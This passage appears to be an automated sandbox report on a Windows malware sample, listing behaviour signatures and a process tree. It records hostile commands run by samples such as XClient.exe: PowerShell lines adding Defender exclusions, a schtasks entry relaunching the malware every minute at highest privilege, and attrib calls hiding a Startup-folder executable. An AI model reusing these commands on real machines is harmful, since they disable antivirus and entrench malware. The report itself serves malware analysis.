PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 4988 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 2188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 2188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 2188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 2188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 2188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 2188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 2188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3176 wrote to memory of 2188 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

System policy modification

defense_evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\bnkrigkawd.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\bnkrigkawd.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Downloaders.zip

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Windows\explorer.exe

"C:\Windows\explorer.exe" shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 27351 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4251183b-c529-41a7-8d91-8e53ac557d75} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 27229 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9cc0e51e-95aa-4547-9b13-6ad1322d4b08} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3264 -childID 1 -isForBrowser -prefsHandle 2980 -prefMapHandle 2848 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75d88463-c8cc-4742-837f-cf01e8033871} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3844 -childID 2 -isForBrowser -prefsHandle 3836 -prefMapHandle 3832 -prefsLen 32603 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9130ac1f-16ad-4cb5-9017-be9c7f3016be} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4680 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4672 -prefMapHandle 4676 -prefsLen 32603 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f93c553-1a5b-4df9-99f5-1047f643c37a} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5332 -childID 3 -isForBrowser -prefsHandle 5324 -prefMapHandle 4688 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {06250da0-bfc0-4206-8418-b7c9fe76ac6e} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5476 -childID 4 -isForBrowser -prefsHandle 5484 -prefMapHandle 5488 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94944873-ef8d-4978-bc1f-b97a2617367b} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5668 -childID 5 -isForBrowser -prefsHandle 5676 -prefMapHandle 5680 -prefsLen 26928 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da95f5f0-4211-41c8-bc9c-919e72244a0a} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7REU2RkFENEQtNjM2RS00RUEzLTgxMzAtOTFEQTc4Q0JBQjIxfSIgdXNlcmlkPSJ7MzVEMjA0RkQtMjdEOC00RTk2LUE3MDItN0VEMjE5NTJEMkQ2fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RDhDMjhEREQtMjU2Ri00MjY4LUI4RDQtQ0VFNDg2ODdEQzkxfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczOTI5NDgzNCIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNzY2NTUyNTM3MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUzMTEyNzI0MjAiLz48L2FwcD48L3JlcXVlc3Q-

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3256 -childID 6 -isForBrowser -prefsHandle 3456 -prefMapHandle 2840 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f433fd1-071a-4ba0-8e0e-b7fa991ec34e} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5448 -childID 7 -isForBrowser -prefsHandle 5424 -prefMapHandle 5440 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebd8e86f-5ca9-4f13-9c64-e4be28907c4b} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2964 -childID 8 -isForBrowser -prefsHandle 6428 -prefMapHandle 2956 -prefsLen 33998 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4679e6b9-9569-4719-aad4-d727965235fc} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6440 -childID 9 -isForBrowser -prefsHandle 1640 -prefMapHandle 6620 -prefsLen 27941 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a408787-ffd7-4646-a7b9-2b98af782eb8} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6680 -childID 10 -isForBrowser -prefsHandle 6892 -prefMapHandle 6888 -prefsLen 27941 -prefMapSize 244628 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b774784c-8211-47dc-90c4-10b9449fb05a} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" tab

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\MicrosoftEdge_X64_133.0.3065.59.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff785436a68,0x7ff785436a74,0x7ff785436a80

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff785436a68,0x7ff785436a74,0x7ff785436a80

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6acd96a68,0x7ff6acd96a74,0x7ff6acd96a80

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6acd96a68,0x7ff6acd96a74,0x7ff6acd96a80

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6acd96a68,0x7ff6acd96a74,0x7ff6acd96a80

C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe

"C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe"

C:\Program Files\ProcessMonitor\Procmon64.exe

"C:\Program Files\ProcessMonitor\Procmon64.exe"

C:\Program Files\ProcessMonitor\Procmon.exe

"C:\Program Files\ProcessMonitor\Procmon.exe"

C:\Users\Admin\AppData\Local\Temp\Procmon64.exe

"C:\Users\Admin\AppData\Local\Temp\Procmon64.exe" /originalpath "C:\Program Files\ProcessMonitor\Procmon.exe"

C:\Program Files\sysint\Procmon64.exe

"C:\Program Files\sysint\Procmon64.exe"

C:\Users\Admin\Desktop\4363463463464363463463463.exe

"C:\Users\Admin\Desktop\4363463463464363463463463.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\4363463463464363463463463.exe

"C:\Users\Admin\Desktop\4363463463464363463463463.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\Fast%20Download.exe

"C:\Users\Admin\Desktop\Files\Fast%20Download.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"

C:\Users\Admin\Desktop\Files\XClient.exe

"C:\Users\Admin\Desktop\Files\XClient.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Users\Admin\Desktop\Files\built.exe

"C:\Users\Admin\Desktop\Files\built.exe"

C:\Users\Admin\Desktop\Files\key.exe

"C:\Users\Admin\Desktop\Files\key.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 400

C:\Users\Admin\Desktop\Files\contorax.exe

"C:\Users\Admin\Desktop\Files\contorax.exe"

C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe

"C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"

C:\Windows\SYSTEM32\schtasks.exe

